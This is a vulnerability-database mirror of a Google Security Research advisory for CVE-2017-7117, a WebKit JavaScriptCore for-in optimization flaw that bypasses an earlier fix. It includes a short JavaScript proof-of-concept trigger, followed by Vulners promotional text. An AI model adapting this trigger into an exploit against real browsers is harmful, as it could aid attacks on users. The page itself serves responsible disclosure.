Lucene search
K

WebKit JSC Incorrect Optimization

🗓️ 03 Oct 2017 00:00:00Reported by Google Security ResearchType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 50 Views

WebKit JSC Incorrect Optimization CVE-2017-7117 PoC bypasses fix for issues in BytecodeGenerator::emitGetByVa

Related
Code
`WebKit: JSC: Incorrect for-in optimization #2  
  
CVE-2017-7117  
  
  
The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal  
  
PoC:  
function f() {  
let o = {};  
for (let i in {xx: 0}) {  
for (i of [0]) {  
  
}  
  
print(o[i]);  
}  
}  
  
f();  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation